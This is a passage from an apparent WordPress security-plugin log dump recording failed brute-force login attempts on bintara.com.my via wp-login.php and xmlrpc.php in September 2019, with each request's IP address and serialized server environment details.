14:35:38',18255848,19555128,'https://bintara.com.my/xmlrpc.php',1,0,'178.62.221.116'),(24158,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.221.116\";s:11:\"REMOTE_PORT\";s:5:\"33220\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@dth0uvyt9KRYoKL8e1wAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568644534.811\";s:12:\"REQUEST_TIME\";s:10:\"1568644534\";}}','notice','2019-09-16 14:35:36','2019-09-16 14:35:35',17738800,19230088,'https://bintara.com.my/wp-login.php',1,0,'178.62.221.116'),(24157,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.221.221.133\";s:11:\"REMOTE_PORT\";s:5:\"40624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@cd3PgbK7GuRh1kKnh3wAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568644215.861\";s:12:\"REQUEST_TIME\";s:10:\"1568644215\";}}','notice','2019-09-16 14:30:17','2019-09-16 14:30:16',18255104,19554872,'https://bintara.com.my/xmlrpc.php',1,0,'103.221.221.133'),(24156,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.221.221.133\";s:11:\"REMOTE_PORT\";s:5:\"39550\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@ccWCCaIOMm5l5jJFHJAAAARY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568644209.61\";s:12:\"REQUEST_TIME\";s:10:\"1568644209\";}}','notice','2019-09-16 14:30:11','2019-09-16 14:30:09',17904880,19230432,'https://bintara.com.my/wp-login.php',1,0,'103.221.221.133'),(24085,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"107.161.24.34\";s:11:\"REMOTE_PORT\";s:5:\"51488\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9usHPgbK7GuRh1kKnFVAAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568632498.4472\";s:12:\"REQUEST_TIME\";s:10:\"1568632498\";}}','notice','2019-09-16 11:15:04','2019-09-16 11:15:02',17737400,19227696,'https://bintara.com.my/wp-login.php',1,0,'107.161.24.34'),(24086,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"107.161.24.34\";s:11:\"REMOTE_PORT\";s:5:\"56664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9uuXPgbK7GuRh1kKnFhQAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568632506.9748\";s:12:\"REQUEST_TIME\";s:10:\"1568632506\";}}','notice','2019-09-16 11:15:11','2019-09-16 11:15:10',18253248,19552696,'https://bintara.com.my/xmlrpc.php',1,0,'107.161.24.34'),(24087,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"57242\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9wO71rBLb0GV3O7mTeoAAAAE8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568632898.8854\";s:12:\"REQUEST_TIME\";s:10:\"1568632898\";}}','notice','2019-09-16 11:21:40','2019-09-16 11:21:39',17737376,19229000,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250'),(24088,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"58734\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9wRHPgbK7GuRh1kKnGOAAAAIQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568632906.8591\";s:12:\"REQUEST_TIME\";s:10:\"1568632906\";}}','notice','2019-09-16 11:21:49','2019-09-16 11:21:48',18255040,19552488,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.133.250'),(24089,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"120.79.15.181\";s:11:\"REMOTE_PORT\";s:5:\"52840\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9wz71rBLb0GV3O7mTewQAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568633045.5908\";s:12:\"REQUEST_TIME\";s:10:\"1568633045\";}}','notice','2019-09-16 11:24:10','2019-09-16 11:24:09',17739280,19229496,'https://bintara.com.my/wp-login.php',1,0,'120.79.15.181'),(24090,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"120.79.15.181\";s:11:\"REMOTE_PORT\";s:5:\"54788\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9w3GCCaIOMm5l5jJFAbQAAAQc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568633053.5579\";s:12:\"REQUEST_TIME\";s:10:\"1568633053\";}}','notice','2019-09-16 11:24:18','2019-09-16 